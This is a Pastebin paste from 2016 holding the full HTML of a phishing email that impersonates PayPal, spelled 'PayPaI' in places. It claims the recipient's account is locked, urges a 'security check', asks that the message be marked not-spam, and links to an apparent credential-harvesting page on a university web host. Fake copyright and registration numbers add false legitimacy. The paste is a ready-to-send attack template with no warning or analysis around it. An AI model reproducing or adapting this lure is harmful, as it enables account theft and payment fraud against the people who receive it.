Advertisement
Guest User

Untitled

a guest
May 13th, 2016
182
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.50 KB | None | 0 0
  1. <html>
  2. <style>
  3. <!--
  4. /* Font Definitions */
  5. @font-face
  6. {font-family:"Cambria Math";
  7. panose-1:2 4 5 3 5 4 6 3 2 4;
  8. mso-font-charset:1;
  9. mso-generic-font-family:roman;
  10. mso-font-format:other;
  11. mso-font-pitch:variable;
  12. mso-font-signature:0 0 0 0 0 0;}
  13. @font-face
  14. {font-family:Tahoma;
  15. panose-1:2 11 6 4 3 5 4 4 2 4;
  16. mso-font-charset:0;
  17. mso-generic-font-family:swiss;
  18. mso-font-pitch:variable;
  19. mso-font-signature:-520081665 -1073717157 41 0 66047 0;}
  20. /* Style Definitions */
  21. p.MsoNormal, li.MsoNormal, div.MsoNormal
  22. {mso-style-unhide:no;
  23. mso-style-qformat:yes;
  24. mso-style-parent:"";
  25. margin:0cm;
  26. margin-bottom:.0001pt;
  27. mso-pagination:widow-orphan;
  28. font-size:12.0pt;
  29. font-family:"Times New Roman","serif";
  30. mso-fareast-font-family:"Times New Roman";
  31. mso-fareast-theme-font:minor-fareast;}
  32. a:link, span.MsoHyperlink
  33. {mso-style-noshow:yes;
  34. mso-style-priority:99;
  35. color:blue;
  36. text-decoration:underline;
  37. text-underline:single;}
  38. a:visited, span.MsoHyperlinkFollowed
  39. {mso-style-noshow:yes;
  40. mso-style-priority:99;
  41. color:purple;
  42. text-decoration:underline;
  43. text-underline:single;}
  44. p
  45. {mso-style-priority:99;
  46. mso-margin-top-alt:auto;
  47. margin-right:0cm;
  48. mso-margin-bottom-alt:auto;
  49. margin-left:0cm;
  50. mso-pagination:widow-orphan;
  51. font-size:12.0pt;
  52. font-family:"Times New Roman","serif";
  53. mso-fareast-font-family:"Times New Roman";
  54. mso-fareast-theme-font:minor-fareast;}
  55. span.SpellE
  56. {mso-style-name:"";
  57. mso-spl-e:yes;}
  58. span.GramE
  59. {mso-style-name:"";
  60. mso-gram-e:yes;}
  61. .MsoChpDefault
  62. {mso-style-type:export-only;
  63. mso-default-props:yes;
  64. font-size:10.0pt;
  65. mso-ansi-font-size:10.0pt;
  66. mso-bidi-font-size:10.0pt;}
  67. @page Section1
  68. {size:595.3pt 841.9pt;
  69. margin:70.85pt 70.85pt 70.85pt 70.85pt;
  70. mso-header-margin:35.4pt;
  71. mso-footer-margin:35.4pt;
  72. mso-paper-source:0;}
  73. div.Section1
  74. {page:Section1;}
  75. -->
  76. </style>
  77. <!--[if gte mso 10]>
  78. <style>
  79. /* Style Definitions */
  80. table.MsoNormalTable
  81. {mso-style-name:"Tableau Normal";
  82. mso-tstyle-rowband-size:0;
  83. mso-tstyle-colband-size:0;
  84. mso-style-noshow:yes;
  85. mso-style-priority:99;
  86. mso-style-qformat:yes;
  87. mso-style-parent:"";
  88. mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
  89. mso-para-margin:0cm;
  90. mso-para-margin-bottom:.0001pt;
  91. mso-pagination:widow-orphan;
  92. font-size:10.0pt;
  93. font-family:"Times New Roman","serif";}
  94. </style>
  95. <![endif]--><!--[if gte mso 9]><xml>
  96. <o:shapedefaults v:ext="edit" spidmax="3074"/>
  97. </xml><![endif]--><!--[if gte mso 9]><xml>
  98. <o:shapelayout v:ext="edit">
  99. <o:idmap v:ext="edit" data="1"/>
  100. </o:shapelayout></xml><![endif]-->
  101. </head>
  102.  
  103. <meta content="text/html; charset=ISO-8859-1" http-equiv="content-type"><style charset="utf-8" type="text/css">/* See license.txt for terms of usage */
  104.  
  105. /** reset styling **/
  106.  
  107. .firebugResetStyles {
  108.  
  109. z-index: 2147483646 !important;
  110.  
  111. top: 0 !important;
  112.  
  113. left: 0 !important;
  114.  
  115. display: block !important;
  116.  
  117. border: 0 none !important;
  118.  
  119. margin: 0 !important;
  120.  
  121. padding: 0 !important;
  122.  
  123. outline: 0 !important;
  124.  
  125. min-width: 0 !important;
  126.  
  127. max-width: none !important;
  128.  
  129. min-height: 0 !important;
  130.  
  131. max-height: none !important;
  132.  
  133. position: fixed !important;
  134.  
  135. -moz-transform: rotate(0deg) !important;
  136.  
  137. -moz-transform-origin: 50% 50% !important;
  138.  
  139. -moz-border-radius: 0 !important;
  140.  
  141. -moz-box-shadow: none !important;
  142.  
  143. background: transparent none !important;
  144.  
  145. pointer-events: none !important;
  146.  
  147. }
  148.  
  149.  
  150.  
  151. .firebugBlockBackgroundColor {
  152.  
  153. background-color: transparent !important;
  154.  
  155. }
  156.  
  157.  
  158.  
  159. .firebugResetStyles:before, .firebugResetStyles:after {
  160.  
  161. content: "" !important;
  162.  
  163. }
  164.  
  165. /**actual styling to be modified by firebug theme**/
  166.  
  167. .firebugCanvas {
  168.  
  169. display: none !important;
  170.  
  171. }
  172.  
  173.  
  174.  
  175. /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
  176.  
  177. .firebugLayoutBox {
  178.  
  179. width: auto !important;
  180.  
  181. position: static !important;
  182.  
  183. }
  184.  
  185.  
  186.  
  187. .firebugLayoutBoxOffset {
  188.  
  189. opacity: 0.8 !important;
  190.  
  191. position: fixed !important;
  192.  
  193. }
  194.  
  195.  
  196.  
  197. .firebugLayoutLine {
  198.  
  199. opacity: 0.4 !important;
  200.  
  201. background-color: #000000 !important;
  202.  
  203. }
  204.  
  205.  
  206.  
  207. .firebugLayoutLineLeft, .firebugLayoutLineRight {
  208.  
  209. width: 1px !important;
  210.  
  211. height: 100% !important;
  212.  
  213. }
  214.  
  215.  
  216.  
  217. .firebugLayoutLineTop, .firebugLayoutLineBottom {
  218.  
  219. width: 100% !important;
  220.  
  221. height: 1px !important;
  222.  
  223. }
  224.  
  225.  
  226.  
  227. .firebugLayoutLineTop {
  228.  
  229. margin-top: -1px !important;
  230.  
  231. border-top: 1px solid #999999 !important;
  232.  
  233. }
  234.  
  235.  
  236.  
  237. .firebugLayoutLineRight {
  238.  
  239. border-right: 1px solid #999999 !important;
  240.  
  241. }
  242.  
  243.  
  244.  
  245. .firebugLayoutLineBottom {
  246.  
  247. border-bottom: 1px solid #999999 !important;
  248.  
  249. }
  250.  
  251.  
  252.  
  253. .firebugLayoutLineLeft {
  254.  
  255. margin-left: -1px !important;
  256.  
  257. border-left: 1px solid #999999 !important;
  258.  
  259. }
  260.  
  261.  
  262.  
  263. /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
  264.  
  265. .firebugLayoutBoxParent {
  266.  
  267. border-top: 0 none !important;
  268.  
  269. border-right: 1px dashed #E00 !important;
  270.  
  271. border-bottom: 1px dashed #E00 !important;
  272.  
  273. border-left: 0 none !important;
  274.  
  275. position: fixed !important;
  276.  
  277. width: auto !important;
  278.  
  279. }
  280.  
  281.  
  282.  
  283. .firebugRuler{
  284.  
  285. position: absolute !important;
  286.  
  287. }
  288.  
  289.  
  290.  
  291. .firebugRulerH {
  292.  
  293. top: -15px !important;
  294.  
  295. left: 0 !important;
  296.  
  297. width: 100% !important;
  298.  
  299. height: 14px !important;
  300.  
  301. background: url(data:image/png) repeat-x !important;
  302.  
  303. border-top: 1px solid #BBBBBB !important;
  304.  
  305. border-right: 1px dashed #BBBBBB !important;
  306.  
  307. border-bottom: 1px solid #000000 !important
  308.  
  309. }
  310.  
  311.  
  312.  
  313. .firebugRulerV {
  314.  
  315. top: 0 !important;
  316.  
  317. left: -15px !important;
  318.  
  319. width: 14px !important;
  320.  
  321. height: 100% !important;
  322.  
  323. background: url('data:image/png') repeat-y !important;
  324.  
  325. border-left: 1px solid #BBBBBB !important;
  326.  
  327. border-right: 1px solid #000000 !important;
  328.  
  329. border-bottom: 1px dashed #BBBBBB !important
  330.  
  331. }
  332.  
  333.  
  334.  
  335. .overflowRulerX > .firebugRulerV {
  336.  
  337. left: 0 !important;
  338.  
  339. }
  340.  
  341.  
  342.  
  343. .overflowRulerY > .firebugRulerH {
  344.  
  345. top: 0 !important;
  346.  
  347. }
  348.  
  349.  
  350.  
  351. /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
  352.  
  353. .fbProxyElement {
  354.  
  355. position: fixed !important;
  356.  
  357. pointer-events: auto !important;
  358.  
  359. }
  360. .style1 {
  361. font-family: "Trebuchet MS";
  362. color: #545454;
  363. }
  364. .style2 {
  365. color: #545454;
  366. }
  367. </style></head>
  368.  
  369. <body lang=FR link=blue vlink=purple style='tab-interval:35.4pt'>
  370.  
  371. <div class=Section1>
  372.  
  373. <div align=center>
  374.  
  375. <table class=MsoNormalTable border=0 cellspacing=0 cellpadding=0 width=611
  376. style='width:458.35pt;mso-cellspacing:0cm;mso-yfti-tbllook:1184;mso-padding-alt:
  377. 0cm 0cm 0cm 0cm'>
  378. <tr style='mso-yfti-irow:0;mso-yfti-firstrow:yes'>
  379. <td width=104 style='width:77.65pt;padding:0cm 0cm 0cm 0cm'>
  380. <p style='mso-line-height-alt:12.75pt'><b><i><span lang=EN-US
  381. style='font-size:28.0pt;font-family:"Tahoma","sans-serif";color:#003366;
  382. background:white;mso-ansi-language:EN-US'>Pay</span></i></b><b><i><span
  383. lang=EN-US style='font-size:28.0pt;font-family:"Tahoma","sans-serif";
  384. color:#009cde;background:white;mso-ansi-language:EN-US'>Pal</span></i></b><span
  385. lang=EN-US style='font-size:28.0pt;font-family:"Tahoma","sans-serif";
  386. color:#545454;mso-ansi-language:EN-US'><o:p></o:p></span></p>
  387. <p style='line-height:12.75pt'><span style='orphans: 2;text-align:start;
  388. widows: 2;-webkit-text-size-adjust: auto;-webkit-text-stroke-width: 0px;
  389. word-spacing:0px'><span lang=EN-US style='font-size:8.0pt;font-family:"Arial","sans-serif";
  390. color:#9F9F9F;background:white;mso-ansi-language:EN-US'>[Notice] : </strong> If this email was sent to you in your Junk or Spam folder
  391. Please Mark it as not spam due to our new security update
  392. Thanks .</td></span></span><span style='orphans: 2;text-align:
  393. start;widows: 2;-webkit-text-size-adjust: auto;-webkit-text-stroke-width: 0px;
  394. float:none;word-spacing:0px'><span lang=EN-US style='font-size:8.0pt;
  395. font-family:"Arial","sans-serif";color:#545454;background:white;mso-ansi-language:
  396. EN-US'>&nbsp;&nbsp;</span></span><span lang=EN-US style='font-size:10.0pt;
  397. font-family:"Tahoma","sans-serif";color:#545454;mso-ansi-language:EN-US'><o:p></o:p></span></p>
  398. </td>
  399. </tr>
  400. <tr style='mso-yfti-irow:1;height:10.5pt'>
  401. <td valign=bottom style='padding:0cm 0cm 0cm 0cm;height:10.5pt'></td>
  402. </tr>
  403. <tr style='mso-yfti-irow:2;mso-yfti-lastrow:yes'>
  404. <td style='padding:0cm 0cm 0cm 0cm'>
  405. <table class=MsoNormalTable border=0 cellspacing=0 cellpadding=0 width="100%"
  406. style='width:100.0%;mso-cellspacing:0cm;mso-yfti-tbllook:1184;mso-padding-alt:
  407. 0cm 0cm 0cm 0cm'>
  408. <tr style='mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes'>
  409. <td style='padding:0cm 0cm 0cm 0cm'>
  410.  
  411.  
  412. <td align="left" valign="top" class="font28" style="font-family: Helvetica, Arial, sans-serif; font-size:39px; -webkit-font-smoothing: antialiased; color: #009cde; text-decoration: none; line-height: 40px; padding: 15px 0 8px;">Your Account is Unverified </td>
  413. </tr>
  414. </table>
  415. <p style='line-height:14.75pt'><span lang=EN-US style='font-size:13.0pt;
  416. font-family:"tahoma","sans-serif";color:#545454;mso-ansi-language:EN-US'>Your account, so we've temporarily locked it to keep your personal informations in safe. To unlock your account, you may need to pass a security check
  417. <br>Update your informations to make sure that your account is safe and your payment are secure .<span
  418. class=GramE></span><br>
  419. <span class=SpellE>The process does not take more than 5 minutes.</span></br>
  420. </span><span class=apple-style-span><span style='orphans: 2;text-align:-webkit-auto;
  421. widows: 2;-webkit-border-horizontal-spacing: 5px;-webkit-border-vertical-spacing: 0px;
  422. -webkit-text-decorations-in-effect: none;-webkit-text-size-adjust: auto;
  423. -webkit-text-stroke-width: 0px;word-spacing:5px'><span lang=EN-US
  424. style='font-size:10.0pt;font-family:"Tahoma","sans-serif";color:#545454;
  425. mso-ansi-language:EN-US'><span style='text-align:-webkit-center'><span
  426. style='orphans: 2;text-align:-webkit-auto;widows: 2;-webkit-border-horizontal-spacing: 0px;
  427. -webkit-border-vertical-spacing: 0px;-webkit-text-decorations-in-effect: none;
  428. -webkit-text-size-adjust: auto;-webkit-text-stroke-width: 0px;word-spacing:
  429. 0px'>
  430. <span lang=EN-US style='mso-ansi-language:EN-US'><o:p></o:p></span></span></span></p>
  431. <span style='orphans: 2;text-align:-webkit-auto;widows: 2;-webkit-border-horizontal-spacing: 0px;
  432. -webkit-border-vertical-spacing: 0px;-webkit-text-decorations-in-effect: none;
  433. -webkit-text-size-adjust: auto;-webkit-text-stroke-width: 0px;word-spacing:
  434. 0px'><span style='text-align:-webkit-center'>
  435. <p class=MsoNormal style='line-height:12.75pt'><strong><span
  436. style='font-size:10.0pt;font-family:"Arial","sans-serif";mso-fareast-font-family:
  437. "Times New Roman";color:#545454'><span style='text-align:-webkit-center'><a
  438. href="https://bobbi.ivytech.edu/~twaelbroeck/session1/validate/token4.php" target="_blank"
  439. style='font-weight:inherit;cursor:pointer'><span lang=EN-US style='color:
  440. #009cde;mso-ansi-language:EN-US'><span style='text-align:-webkit-center'><span
  441. style='orphans: 2;text-align:-webkit-auto;widows: 5;border-spacing: 5px;
  442. -webkit-text-decorations-in-effect: none;-webkit-text-size-adjust: auto;
  443. -webkit-text-stroke-width: 0px;word-spacing:0px'>Click here to Confirm Your
  444. Account Information.</span></a></span></span></span></strong></span><span
  445. lang=EN-US style='mso-fareast-font-family:"Times New Roman";mso-ansi-language:
  446. EN-US'><o:p></o:p></span></p>
  447. </span></td>
  448. </span>
  449. </tr>
  450. </table>
  451.  
  452. </div>
  453.  
  454. <p class=MsoNormal style='line-height:12.75pt'><span class=apple-style-span><span
  455. lang=EN-US style='font-size:10.0pt;font-family:"Tahoma","sans-serif";
  456. color:#009cde;display:none;mso-hide:all;mso-ansi-language:EN-US'><o:p>&nbsp;</o:p></span></span></p>
  457.  
  458. <div align=center>
  459.  
  460. <table class=MsoNormalTable border=0 cellspacing=0 cellpadding=0 width=600
  461. style='width:450.0pt;mso-cellspacing:0cm;mso-yfti-tbllook:1184;mso-padding-alt:
  462. 0cm 0cm 0cm 0cm'>
  463. <tr style='mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes'>
  464. <td style='padding:0cm 0cm 0cm 0cm'>
  465. <table class=MsoNormalTable border=0 cellspacing=0 cellpadding=0 width="100%"
  466. style='width:100.0%;mso-cellspacing:0cm;mso-yfti-tbllook:1184;mso-padding-alt:
  467. 0cm 0cm 0cm 0cm'>
  468. <tr style='mso-yfti-irow:0;mso-yfti-firstrow:yes'>
  469. <td style='padding:0cm 0cm 0cm 0cm'>
  470. <p class=MsoNormal><span lang=EN-US style='font-size:10.0pt;font-family:
  471. "Arial","sans-serif";mso-fareast-font-family:"Times New Roman";color:#666666;
  472. mso-ansi-language:EN-US'><br>
  473. </span><span class=SpellE><span style='font-size:10.0pt;font-family:"Arial","sans-serif";
  474. mso-fareast-font-family:"Times New Roman";color:#666666'>Department</span></span><span
  475. style='font-size:10.0pt;font-family:"Arial","sans-serif";mso-fareast-font-family:
  476. "Times New Roman";color:#666666'> <span class=SpellE>review</span> <span
  477. class=SpellE>PayPaI</span> <span class=SpellE>accounts</span></span><span
  478. style='mso-fareast-font-family:"Times New Roman"'><o:p></o:p></span></p>
  479. </td>
  480. </tr>
  481. <tr style='mso-yfti-irow:1;height:42.75pt'>
  482. <td style='padding:0cm 0cm 0cm 0cm;height:42.75pt'>
  483. <p class=MsoNormal><span lang=EN-US style='font-size:7.5pt;font-family:
  484. "Arial","sans-serif";mso-fareast-font-family:"Times New Roman";color:#545454;
  485. mso-ansi-language:EN-US'>copyright 1999-2016 <span class=SpellE>PayPaI.All</span>
  486. rights reserved<br>
  487. PayPaI FSA Register Number:1388561750</span><span lang=EN-US
  488. style='mso-fareast-font-family:"Times New Roman";mso-ansi-language:EN-US'><span
  489. style='orphans: 2;text-align:-webkit-auto;widows: 2;-webkit-border-horizontal-spacing: 0px;
  490. -webkit-border-vertical-spacing: 0px;-webkit-text-decorations-in-effect: none;
  491. -webkit-text-size-adjust: auto;-webkit-text-stroke-width: 0px;word-spacing:
  492. 0px'><o:p></o:p></span></p>
  493. </td>
  494. </tr>
  495. <span style='text-align:-webkit-center'>
  496. <tr style='mso-yfti-irow:2;mso-yfti-lastrow:yes'>
  497. <td style='padding:0cm 0cm 0cm 0cm'><span style='text-align:-webkit-center'><span
  498. style='orphans: 2;text-align:-webkit-auto;widows: 2;-webkit-border-horizontal-spacing: 0px;
  499. -webkit-border-vertical-spacing: 0px;-webkit-text-decorations-in-effect: none;
  500. -webkit-text-size-adjust: auto;-webkit-text-stroke-width: 0px;word-spacing:
  501. 0px'>
  502. <p class=MsoNormal><span class=SpellE><span class=apple-style-span><b><span
  503. style='font-size:7.5pt;font-family:"Arial","sans-serif";mso-fareast-font-family:
  504. "Times New Roman";color:#545454'>PayPaI</span></b></span></span><span
  505. class=apple-style-span><b><span style='font-size:7.5pt;font-family:"Arial","sans-serif";
  506. mso-fareast-font-family:"Times New Roman";color:#545454'> Email ID PP</span></span><span
  507. style='orphans: 2;text-align:-webkit-auto;widows: 2;-webkit-border-horizontal-spacing: 0px;
  508. -webkit-border-vertical-spacing: 0px;-webkit-text-decorations-in-effect: none;
  509. -webkit-text-size-adjust: auto;-webkit-text-stroke-width: 0px;word-spacing:
  510. 0px'></b></span></span><b></span><span style='text-align:-webkit-center'>156930</span></b><span
  511. style='mso-fareast-font-family:"Times New Roman"'><o:p></o:p></span></p>
  512. </td>
  513. </tr>
  514. </span>
  515. </table>
  516. </td>
  517. </tr>
  518. </table>
  519.  
  520. </div>
  521.  
  522. <p class=MsoNormal><span style='mso-fareast-font-family:"Times New Roman"'><o:p>&nbsp;</o:p></span></p>
  523.  
  524. </div>
  525.  
  526. </body>
  527.  
  528. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement